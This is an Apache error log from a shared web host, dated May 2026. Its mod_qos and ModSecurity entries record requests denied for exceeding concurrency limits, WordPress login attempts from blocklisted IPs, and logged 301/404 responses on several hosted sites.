[Tue May 26 19:59:54.596182 2026] [qos:error] [pid 106517:tid 106776] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UqAAAAQI
[Tue May 26 19:59:54.596255 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuYoZZc2DoU1lPnP1UpwAAANQ
[Tue May 26 19:59:54.596316 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuYoZZc2DoU1lPnP1UpgAAAOA
[Tue May 26 19:59:54.599105 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuYoZZc2DoU1lPnP1UqgAAANI
[Tue May 26 19:59:54.607836 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3VwAAAGc
[Tue May 26 19:59:54.614723 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3WAAAACE
[Tue May 26 19:59:54.669750 2026] [security2:error] [pid 93576:tid 93647] [remote 5.42.158.148:48358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWuYmDRMqfxdEDkosz3VgAAK0M"], referer: https://moes-art.com/wp-login.php
[Tue May 26 19:59:54.740131 2026] [security2:error] [pid 106517:tid 106539] [remote 79.112.96.62:52402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.96.112.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UlAAAnRM"]
[Tue May 26 19:59:54.742854 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3WgAAABo
[Tue May 26 19:59:54.745897 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3WwAAAFk
[Tue May 26 19:59:54.746712 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UtwAAAKo
[Tue May 26 19:59:54.747058 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3XAAAAA0
[Tue May 26 19:59:54.748744 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3XQAAAHc
[Tue May 26 19:59:54.749727 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UuAAAAOI
[Tue May 26 19:59:54.753806 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3XgAAAFM
[Tue May 26 19:59:54.755202 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3XwAAAFU
[Tue May 26 19:59:54.761359 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3YAAAACM
[Tue May 26 19:59:54.768648 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3YQAAABQ
[Tue May 26 19:59:54.892832 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3YgAAAEU
[Tue May 26 19:59:54.896285 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3YwAAACQ
[Tue May 26 19:59:54.896971 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UvAAAANs
[Tue May 26 19:59:54.900341 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3ZAAAAC8
[Tue May 26 19:59:54.902305 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3ZQAAAHw
[Tue May 26 19:59:54.903810 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYoZZc2DoU1lPnP1UvQAAAMY
[Tue May 26 19:59:54.904038 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3ZgAAAFw
[Tue May 26 19:59:54.907397 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3ZwAAAAI
[Tue May 26 19:59:54.915159 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3aAAAAHU
[Tue May 26 19:59:54.924757 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuYmDRMqfxdEDkosz3aQAAAAU
[Tue May 26 19:59:55.046079 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3bAAAACU
[Tue May 26 19:59:55.046899 2026] [qos:error] [pid 106517:tid 106666] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1UxQAAAJU
[Tue May 26 19:59:55.048102 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3bQAAAEg
[Tue May 26 19:59:55.051821 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3bgAAAAE
[Tue May 26 19:59:55.053473 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3bwAAAEE
[Tue May 26 19:59:55.056505 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3cAAAACI
[Tue May 26 19:59:55.057390 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1UxwAAAKo
[Tue May 26 19:59:55.061900 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3cQAAAG4
[Tue May 26 19:59:55.068875 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3cwAAAF8
[Tue May 26 19:59:55.078261 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3dAAAACY
[Tue May 26 19:59:55.196273 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3dwAAADE
[Tue May 26 19:59:55.198007 2026] [qos:error] [pid 106517:tid 106712] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1UzQAAAMI
[Tue May 26 19:59:55.200841 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3eAAAAD0
[Tue May 26 19:59:55.202926 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3eQAAAFc
[Tue May 26 19:59:55.203550 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3egAAABM
[Tue May 26 19:59:55.210237 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3ewAAABU
[Tue May 26 19:59:55.212319 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1U0QAAAKA
[Tue May 26 19:59:55.216451 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3fAAAABg
[Tue May 26 19:59:55.222849 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3fQAAAGc
[Tue May 26 19:59:55.231915 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3fgAAACE
[Tue May 26 19:59:55.291282 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UNwAAAQQ"]
[Tue May 26 19:59:55.305679 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3BwAAADs"]
[Tue May 26 19:59:55.315072 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3DgAAAAQ"]
[Tue May 26 19:59:55.316686 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3CAAAAEI"]
[Tue May 26 19:59:55.327656 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3BQAAADg"]
[Tue May 26 19:59:55.327763 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3DQAAAHg"]
[Tue May 26 19:59:55.332127 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3CgAAABI"]
[Tue May 26 19:59:55.341854 2026] [security2:error] [pid 106517:tid 106703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UPQAAALk"]
[Tue May 26 19:59:55.346745 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UYgAAAMc"]
[Tue May 26 19:59:55.348188 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1USAAAAKk"]
[Tue May 26 19:59:55.361363 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3DAAAACc"]
[Tue May 26 19:59:55.365418 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3BgAAAGY"]
[Tue May 26 19:59:55.366641 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UPgAAALc"]
[Tue May 26 19:59:55.366758 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UPAAAAPA"]
[Tue May 26 19:59:55.369417 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UQAAAAK8"]
[Tue May 26 19:59:55.373005 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UQQAAAIU"]
[Tue May 26 19:59:55.374738 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UQgAAAM0"]
[Tue May 26 19:59:55.381143 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3IwAAAAA"]
[Tue May 26 19:59:55.386022 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYYZZc2DoU1lPnP1UQwAAAKc"]
[Tue May 26 19:59:55.391620 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3LwAAAC4"]
[Tue May 26 19:59:55.391828 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYWDRMqfxdEDkosz3CwAAAA8"]
[Tue May 26 19:59:55.424404 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UbQAAANM"]
[Tue May 26 19:59:55.427923 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UbwAAAN0"]
[Tue May 26 19:59:55.429502 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3OwAAAFQ"]
[Tue May 26 19:59:55.432514 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3NwAAAFI"]
[Tue May 26 19:59:55.438027 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3MAAAAEY"]
[Tue May 26 19:59:55.438952 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UbgAAAJk"]
[Tue May 26 19:59:55.471674 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UcAAAALw"]
[Tue May 26 19:59:55.481540 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UgAAAALU"]
[Tue May 26 19:59:55.481886 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuYoZZc2DoU1lPnP1UdAAAAKw"]
[Tue May 26 19:59:55.491330 2026] [security2:error] [pid 93576:tid 93808] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuYmDRMqfxdEDkosz3awAAAGA"]
[Tue May 26 19:59:55.523820 2026] [security2:error] [pid 93576:tid 93646] [remote 46.224.234.158:42854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuY2DRMqfxdEDkosz3hQAAR0I"]
[Tue May 26 19:59:55.639638 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz30AAAAFI
[Tue May 26 19:59:55.640657 2026] [qos:error] [pid 106517:tid 106763] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY4ZZc2DoU1lPnP1U8wAAAPU
[Tue May 26 19:59:55.640796 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY4ZZc2DoU1lPnP1U9gAAAOA
[Tue May 26 19:59:55.640963 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuY2DRMqfxdEDkosz3xgAAABU
[Tue May 26 19:59:55.641191 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY2DRMqfxdEDkosz30gAAAFk
[Tue May 26 19:59:55.641486 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY2DRMqfxdEDkosz30wAAADs
[Tue May 26 19:59:55.642419 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY2DRMqfxdEDkosz31QAAAFI
[Tue May 26 19:59:55.647534 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY2DRMqfxdEDkosz32QAAAEU
[Tue May 26 19:59:55.649913 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY2DRMqfxdEDkosz33QAAACU
[Tue May 26 19:59:55.653542 2026] [qos:error] [pid 106517:tid 106729] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuY4ZZc2DoU1lPnP1U-wAAANM
[Tue May 26 19:59:55.833925 2026] [security2:error] [pid 93576:tid 93644] [remote 46.224.234.158:42854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuY2DRMqfxdEDkosz34wAAJkA"], referer: https://freshmindsolutions.com/wp-login.php
